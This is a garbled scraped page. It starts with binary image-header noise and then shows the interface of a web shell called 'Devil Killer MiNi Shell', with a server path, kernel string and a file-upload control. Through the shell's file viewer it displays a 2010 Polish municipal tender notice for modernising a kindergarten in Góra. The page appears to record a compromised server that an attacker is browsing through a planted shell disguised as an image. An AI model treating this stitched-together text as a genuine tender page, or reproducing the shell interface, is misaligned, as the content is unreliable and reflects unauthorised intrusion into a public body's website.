JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100630/172063-N-2010.html

<p class="kh_header"><b>Góra: wykonanie robót budowlanych w ramach zadania inwestycyjnego p.n.
Lokalny Program Rewitalizacji
,, Modernizacja Przedszkola Nr 1 w Górze ul. Żeromskiego,,.</b><br>
<b>Numer ogłoszenia: 172063 - 2010; data zamieszczenia: 30.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Góra , ul. Mickiewicza 1, 56-200 Góra, woj. dolnośląskie, tel. 065 5443644, faks 065/543-26-58.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gora.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie robót budowlanych w ramach zadania inwestycyjnego p.n.
Lokalny Program Rewitalizacji
,, Modernizacja Przedszkola Nr 1 w Górze ul. Żeromskiego,,..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zestawienie powierzchni terenu:
-	powierzchnia działki nr 923	- Pdz= 5777,00 m2
-	powierzchnia zabudowy - budynek projektowany 733,21 m2
-	powierzchnia zabudowy - elementy
-	powierzchnia tarasów i wejść - 481,70 m2
-	powierzchnia ist. bud. mieszkalnego - 124,8 m2
-	powierzchnia ist. bud. śmietnika - 34,9 m2
-	chodnik bet. z płyt 50x50 - 288,4 m2
-	komunikacja piesza utwardzona/ szutrowa - 511,1 m2
-	komunikacja kołowa, asfalt - 231.6 m2
-	plac zabaw - 1719,4 m2
-	powierzchnia zieleni niskiej i wysokiej - 1651,89 m2
Istniejący budynek pochodzi z drugiej połowy lat 60 w stylu modernistycznym, proste bryły pozbawione detalu architektonicznego. Budynek wykonano w technologii tradycyjnej, ściany murowane z cegły pełnej na bazie wcześniejszego budynku z okresu przedwojennego. Stropy płaskie płytowe na belkach stalowych w piwnicy, klatki schodowe żelbetowe płytowe, dachy płaskie jednospadowe na płytach korytkowych. Na podstawie dokonanej wizji lokalnej i programu funkcjonalno-użytkowego stwierdza się, że budynek wymaga natychmiastowego remontu i modernizacji technicznej instalacji i elementów konstrukcyjno-wykończeniowych takich jak:
-	ocieplenie powierzchni dachów i ścian zewnętrznych,
-	instalacji co, wod.-kan., wentylacji, nieszczelne instalacje powodują zacieki pomieszczeń, węzły sanitarne w znacznym stopniu wyeksploatowane, instalacje techniczne są zużyte i wyeksploatowane,
-	instalacja elektryczna nie spełnia warunków aktualnych przepisów i norm.
-	podłóg i posadzek, które są w złym stanie technicznym i zagrażają bezpieczeństwu użytkowania,
Zauważono również pęknięcia na ścianach zewnętrznych w strefach piwnicznych, prawdopodobnie spowodowane są zawilgoceniem, które są skutkiem braku izolacji przeciwwilgociowych i niewłaściwego odprowadzania wód deszczowych. nieszczelnych parapetów oraz przecieków z rur instalacji wodnej i kanalizacyjnych. Pęknięcia sufitów spowodowane klawiszowaniem stropów gęstożebrowych. Wymienione elementy wpływają bezpośrednio na warunki sanitarno-higieniczne i estetyczne obiektu i oceniono je jako nie zadawalające. Podczas wykonywania izolacji pionowej na ściany piwnic nastąpi odsłonięcie istniejących instalacji i wówczas można będzie stwierdzić, czy wymiana częściowa lub całościowa jest konieczna.
Przedmiotem inwestycji jest modernizacja istniejącego budynku Przedszkola sześciodziałowego przeznaczonego dla 180 dzieci. Obiekty towarzyszące: mała architektura, plac zabaw, zewnętrzna infrastruktura techniczna /z wyjątkiem: fontanny i przyłącza cieplnego/ oraz zieleń nie stanowi przedmiotu projektu. Projektowany budynek położony jest na działce o numerze ewidencyjnym 923 w Górze. 
W ramach projektu planuje się wprowadzenie dodatkowych funkcji biurowych oraz socjalnych, przystosowanie budynku dla osób niepełnosprawnych, poprawę układu funkcjonalnego salek zajęciowych oraz podwyższenie standardu jakościowego, estetycznego i energetycznego Przedszkola. Dla obsługi personelu planowane jest wprowadzenie oddzielnej komunikacji z wejściem zewnętrznym. Wielkość obiektu, ilość pomieszczeń do użytku publicznego, ilość pokoi dla pracowników oraz wielkość i struktura funkcji pomocniczych ulegnie niewielkim zmianom. Projekt przewiduje powstanie nowoczesnego obiektu o zwiększonym poziomie bezpieczeństwa oraz umożliwia prowadzenie zajęć dydaktyczno-wychowawczych na wysokim poziomie. Przewidziano tzw. bezkolizyjność komunikacyjną z możliwością korzystania z przestrzeni zewnętrznej istniejącego placu zabaw. Budynek wyposażony jest w:
-	trzy niezależne kl. schodowe oraz windę,
-	cztery niezależne wejścia zewnętrzne,
-	7 sal zabaw z zapleczem sanitarno-socjalnym i magazynowym,
-	pomieszczenia biurowe,
-	jadalnię i zapleczem kuchennym,
-	węzły sanitarne dla pracowników, uczestników i osób niepełnosprawnych,
-	szatnię,
-	komunikację poziomą dostosowaną do osób niepełnosprawnych.

Wskaźniki funkcjonalno użytkowe

Cały obiekt przewidziany jest dla 180 dzieci dodatkowo ok.30 osób personelu pracowniczego. W obiekcie występują:
-	6 sal zabaw na 25 osób,
-	sala ćwiczeń korekcyjnych na 25 osób,
-	jadalnia przewidziana na 25-30 osób/zmianę,
W branży elektrycznej zakres prac obejmuje:
-	przebudowa przyłącza, 
-	wewnętrzne linie zasilające,
-	tablice rozdzielcze,
-	instalacje oświetleniowe,
-	instalacje siłowe,
-	instalacje odgromowe,
-	instalacje monitoringu i sygnalizacji włamaniowej,
-	instalacje przyzewowe - interkomowi,
-	sieci strukturalne instalacji telefonicznych i komputerowych,
-	instalacja antenowa rtv AZART,
-	instalacja wyrównawcza i ochrony od porażeń i przepięć,
Instalacja wodno-kanalizacyjna, c.o., instalacja wentylacji

W istniejącym budynku przedszkolnym wykonane będą następujące prace remontowo-modernizacyjne w zakresie instalacji sanitarnych wraz z przyłączem cieplnym do budynku:
-	do robót remontowo-modernizacyjne:
-	demontaż instalacji w budynku przedszkola,
-	montaż instalacji kanalizacyjnej,
-	montaż instalacji wodociągowej,
-	montaż i regulacja instalacji c.o.,
-	montaż i regulacja instalacji ogrzewania podłogowego,
-	montaż wentylacji mechanicznej,
-	wykonanie przyłącza cieplnego,
-	wykonanie węzła cieplnego,
-	roboty demontażowe instalacji zawierają:
-	demontaż istniejącej kotłowni węglowej,
-	demontaż istniejącej instalacji c.o.,
-	demontaż instalacji kanalizacyjnej,
-	demontaż instalacji wodociągowej,
-	demontaż istniejącej armatury,
-	montaż instalacji kanalizacyjnej:
-	montaż kanalizacji podposadzkowej,
-	montaż kanalizacji nadposadzkowej,
-	biały montaż,
-	wykonanie prób i odbiorów,
-	montaż instalacji wodociągowej:
-	wykonanie instalacji,
-	wykonanie izolacji termicznych,
-	wykonanie prób i odbiorów,
-	montaż i regulacja instalacji c.o., 
-	wykonanie instalacji,
-	montaż grzejników, zaworów,
-	wykonanie prób i odbiorów,
-	wykonanie regulacji jakościowej i ilościowej przepływu czynnika grzewczego z regulacją i dokonaniem nastawy na zaworach,
-	montaż i regulacja instalacji ogrzewania podłogowego:
-	wykonanie instalacji,
-	montaż izolacji,
-	montaż rur grzejnych,
-	montaż rozdzielaczy,
-	montaż automatyki,
-	montaż wentylacji mechanicznej:
-	montaż urządzeń wentylacyjnych,
-	montaż kanałów wentylacyjnych,
-	montaż kratek wentylacyjnych,
-	montaż automatyki,
-	wykonanie przyłącza cieplnego:
-	wykonanie wykopów,
-	montaż rurociągów,
-	wykonanie prób i odbiorów,
-	zakopanie wykopów,
-	odtworzenie nawierzchni,
-	wykonanie węzła cieplnego
-	montaż węzła cieplnego,
-	wykonanie prób i odbiorów,
-	wykonanie regulacji jakościowej i ilościowej przepływu czynnika grzewczego z regulacją.
Zakres  robót w branży ogólnobudowlanej:
-	posadzki, ścianki działowe, otwory okienne, tynki, malowanie i licowanie, roboty rozbiórkowe i murarskie, 
-	stolarka okienna i drzwiowa, roboty izolacyjne, roboty kowalsko- ślusarskie, okładziny ścienne, sufity podwieszane, dostawa i montaż windy, docieplenie stropodachu, wyposażenie, elewacja.

Uwaga: wszystkie materiały z rozbiórek nadające się do zbycia lub powtórnego wykorzystania Wykonawca przekaże kierownictwu obiektu.
Dokładny opis przedmiotu zamówienia  zawarto w dokumentacji projektowej i specyfikacjach technicznych wykonania i odbioru robót. Dodatkowo, pomocniczo ( w obliczu wyboru wynagrodzenia ryczałtowego) załączono przedmiary robót. 
Wykonawca zapewni obsługę geodezyjną wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej.
We wszystkich przypadkach, w których ze względu na specyfikę przedmiotu zamówienia wskazano pochodzenie materiałów i urządzeń , dopuszcza się stosowanie materiałów i urządzeń równoważnych tj. wszelkie wymienione z nazwy materiały i urządzenia użyte w przekazanej przez Zamawiającego dokumentacji służą określeniu standardu i mogą być zastąpione innymi materiałami o nie gorszych parametrach technicznych, użytkowych , jakościowych, funkcjonalnych i walorach estetycznych, przy uwzględnieniu prawidłowej  współpracy z pozostałymi materiałami i urządzeniami. Pojęcie równoważności znajduje również zastosowanie w przypadku, gdy Zamawiający opisał przedmiot zamówienia za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia.
Dodatkowy opis dotyczący wymagań dla rozwiązań równoważnych:
- w przypadku windy osobowej za rozwiązanie równoważne uważa się windę osobową, przeszkoloną , hydrauliczną , udźwig 1250 kg, kabina przelotowa, 2/3 przystanków, wymiary kabiny 1375x1600 mm ( dopuszczalne odchylenia w zakresach dopuszczonych na rysunkach) , kabina i drzwi ze stali nierdzewnej, dostosowana do potrzeb osób niepełnosprawnych.
Uwagi dodatkowe: w miesiącu lipcu i sierpniu 2010 r. obiekt będzie nieczynny, a w pozostałych miesiącach 
Wykonawca musi zorganizować prace na czynnym obiekcie.

W przypadkach koniecznych i uzasadnionych technologią robót Zamawiający będzie współpracował z Wykonawcą co do warunków organizacji pracy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających do wartości 50 % wartości zamówienia podstawowego na zasadach opisanych w art. 67 ust.6 ustawy Prawo zamówień publicznych ( t.j. Dz. U.z 2007 r. , Nr 223, poz. 1655 z późn.zm.).
Ewentualne zamówienia uzupełniające będą dotyczyły robót o kodach CPV tożsamych dla zakresu zamówienia podstawowego na terenie obiektu, stanowiącego przedmiot zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.23.00-4, 45.26.24.00-5, 45.26.25.00-6, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0, 45.31.20.00-7, 45.31.40.00-1, 45.31.50.00-8, 45.33.10.00-6, 45.33.20.00-3, 45.34.00.00-2, 45.34.10.00-9, 45.34.20.00-6, 45.34.30.00-3, 45.40.00.00-1, 45.42.00.00-7, 45.42.10.00-4, 45.43.00.00-0, 45.43.10.00-7, 45.44.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. W postępowaniu wprowadza się obowiązek wniesienia wadium w wysokości 50 000,00 PLN ( pięćdziesiąt tysięcy  złotych).
2. Zasady i formy wnoszenia wadium opisano w w.w. przepisach ustawy Pzp.
3.	Jeżeli wykonawca wnosi wadium w formie innej niżeli gotówkowa, załącza do oferty kopię dokumentu wadialnego , a jego oryginał deponuje w kasie Zamawiającego przed terminem złożenia ofert, tj. przed 21.07. 2010 r. przed godz. 12.00.
4.	Wadium wniesione w pieniądzu należy wpłacić przelewem na konto BANK SPÓŁDZIELCZY WSCHOWA O / GÓRA 44 8669 0001 0123 2529 2000 0003.
z dopiskiem wadium w przetargu nieograniczonym na: (jakiego postępowania dotyczy) .
5.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
6.	Wadium powinno obejmować cały okres związania  ofertą. 
7.	Za termin wniesienia wadium uważa się termin wpływu środków na konto zamawiającego. 
8.	Wykonawca, którego oferta nie będzie zabezpieczona wadium wniesionym we właściwej formie, terminie i kwocie zostanie wykluczony z przedmiotowego postępowania. 
9.	Zamawiający zwróci lub zatrzyma wadium zgodnie z art. 46 ustawy. 
10.	Jeżeli wadium jest wnoszone w formie innej niżeli pieniądz , - zapisy dokumentu wadialnego winny zabezpieczać w pełni interes Zamawiającego w zakresie sytuacji zatrzymania wadium , opisanych w ustawie Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże iż w badanym okresie wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył przynajmniej jedną robotę budowlaną, polegającą na budowie sieci cieplnej wraz z węzłem cieplnym oraz przynajmniej dwie roboty budowlane wielobranżowe o wartości powyżej 1 800 000,00 złotych każda. 
Ocena spełniania warunków udziału w postępowaniu nastąpi przy zastosowaniu formuły spełnia- nie spełnia. / do wyliczenia okresu 5 letniego Zamawiający weźmie pod uwagę termin zakończenia/.

W przypadku Wykonawców występujących wspólnie warunki spełniają oni wspólnie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli zapewni kierownika budowy w branży konstrukcyjno- budowlanej oraz kierowników robót w branży sanitarnej i branży elektrycznej, posiadających wymagane prawem uprawnienia.
W przypadku Wykonawców występujących wspólnie warunki spełniają oni wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 18. Zmiana umowy.
1.	Wykonawcy przysługuje uprawnienie do ubiegania się o wyznaczenie przez Zamawiającego nowych terminów wykonania prac budowlanych w wypadku:
a)	przerwanie robót budowlanych przez właściwe organy administracji rządowej lub samorządowej, lub w wyniku wykonalnego orzeczenia sądu, które to decyzje zostały wydane nie z przyczyn leżących po stronie Wykonawcy.
b)	Wystąpienia zdarzenia zewnętrznego nie dającego się przewidzieć, na które strony umowy nie mają wpływu i którego skutkom nie można było zapobiec, nawet przy zachowaniu należytej staranności, a które uniemożliwia Wykonawcy wykonanie w całości lub w części jego zobowiązań umownych, w szczególności: klęski żywiołowe i inne zdarzenia związane z działaniem siły przyrody, takie jak: trzęsienia ziemi, powódź, a także zdarzenia pozostające poza kontrolą i wolą stron umowy oraz osób, za które strony ponoszą odpowiedzialność (w tym podwykonawcy), takie jak wojna i działania wojenne, zamieszki wewnętrzne, akty terroryzmu, skażenia radioaktywne,
c)	odkrycie na Terenie Budowy broni, bomb, niewybuchów lub innych materiałów wybuchowych oraz przedmiotów o znaczeniu archeologicznym i historycznym,
d)	wykrycie instalacji, urządzeń lub budowli podziemnych nie ujętych w dokumentacji projektowej i nie zinwentaryzowanych przez właścicieli i gestorów instalacji i urządzeń, a wymagających przebudowy w związku z wykonaniem przedmiotu umowy,
e)	zmian przepisów prawa, mających wpływ na termin wykonania robót lub sposób prowadzenia robót,
f)	opóźnień w rozpoczęciu i wykonaniu robót budowlanych, powstałych z przyczyn nie leżących po stronie Wykonawcy, których nie można było przewidzieć w chwili  zawarcia umowy, przy zachowaniu należytej staranności, np. konieczność wykonania robót nie ujętych w dokumentacji projektowej, uniemożliwiających terminową realizację zadania,
g)  innych przeszkód o charaktersze obiektywnym, niezawinionym przez wykonawcę.
Termin zostanie wydłużony jedynie o czas trwania przeszkody,
       
2.	Wykonawcy przysługuje uprawnienie do ubiegania się o wyznaczenie przez Zamawiającego nowych terminów wykonania prac budowlanych w terminie 30 dni od powzięcia wiadomości o okolicznościach stanowiących podstawę tego uprawnienia.
3.	Zamawiający ma prawo, jeżeli jest to niezbędne do prawidłowej realizacji robót wprowadzić zmiany do dokumentacji projektowej, jakie okażą się konieczne, zmienić określoną harmonogramem rzeczowo - finansowym kolejność robót, a także przerwać realizację robót na czas określony. Wprowadzone przez Zamawiającego zmiany nie unieważniają w jakiejkolwiek mierze umowy, natomiast skutki tych zmian mogą stanowić podstawę do zmiany terminu zakończenia robót oraz zmiany wynagrodzenia w okolicznościach przewidzianych w umowie.
4.	Wykonawca może z własnej inicjatywy wnioskować o zmiany w sposobie realizacji robót objętych umową inaczej niż to przewiduje Dokumentacja projektowa zatwierdzona przez Zamawiającego, albo zastosować inne materiały, urządzenia lub konstrukcję, niż określone w dokumentacji projektowej, jeżeli zmiany te są konieczne, np. wyrób został wycofany z obrotu i stosowania w budownictwie, producent lub dystrybutor wyrobu stosuje praktyki monopolistyczne, zaprojektowane rozwiązanie materiałowe posiada istotne wady ( w tym przypadku Zamawiający zastrzega sobie prawo wprowadzenia rozwiązania zamiennego bez skutków finansowych)  i nie wpłyną na zmniejszenie trwałości, wartość użytkową, estetyczna i techniczną obiektu oraz na przedłużenie terminu wykonania umowy, jak też na zwiększenie wynagrodzenia wykonawcy i kosztów eksploatacji wykonanego obiektu. Zmiany te nie mogą naruszać przepisów techniczno - budowlanych, a w szczególności przepisów bezpieczeństwa i higieny pracy. Zmiany te będą pożądane zwłaszcza w przypadku zastosowania surowców i materiałów ekologicznych korzystnych dla środowiska. 
5. Istnieje możliwość dokonania zmiany kierownika budowy oraz pozostałych osób przedstawionych po podpisaniu umowy za uprzednią pisemną zgodą Zamawiającego. Wykonawca z własnej inicjatywy proponuje zmianę osób wyszczególnionych w ust. 3 niniejszego paragrafu w następujących przypadkach:
a) śmierci, choroby lub innych zdarzeń losowych;
b) jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od
Wykonawcy.
6. W przypadku zmiany osób wyszczególnionych w ust. 3 niniejszego paragrafu, nowe osoby powołane do pełnienia w/w obowiązków muszą spełniać wymagania określone przepisami prawa dla danej funkcji.
7. Zamawiający może także zażądać od Wykonawcy zmiany osób, o których mowa w ust. 3 niniejszego paragrafu, jeżeli uzna, że nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób w terminie nie dłuższym niż 14 dni od daty złożenia wniosku przez Zamawiającego.
4.	Jeżeli w trakcie realizacji niniejszej umowy zajdzie konieczność rezygnacji z wykonania części robót objętych przedmiotem umowy (roboty wyłączone) Zamawiający ustali w oparciu o załączony do oferty przetargowej kosztorys i harmonogram rzeczowo - finansowy wartość robót wyłączonych i wartość wynagrodzenia za cały zmieniony przedmiot umowy.
Szzczegółowy opis i warunki zmian zawarto w projekcie umowy, satnowiącym załącznik do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gora.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Górze, ul. Mickiewicza 1, 56-200 Góra, pokój nr 5..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.07.2010 godzina 12:00, miejsce: Urząd Miasta i Gminy w Górze, ul. Mickiewicza 1, 56-200 Góra, pokój nr 101- sekretariat, I piętro budynku..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt planowany do dofinansowania przez Unię Europejską z Europejskiego Funduszu Rozwoju
Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa
Dolnośląskiego na lata 2007-2013.</p>
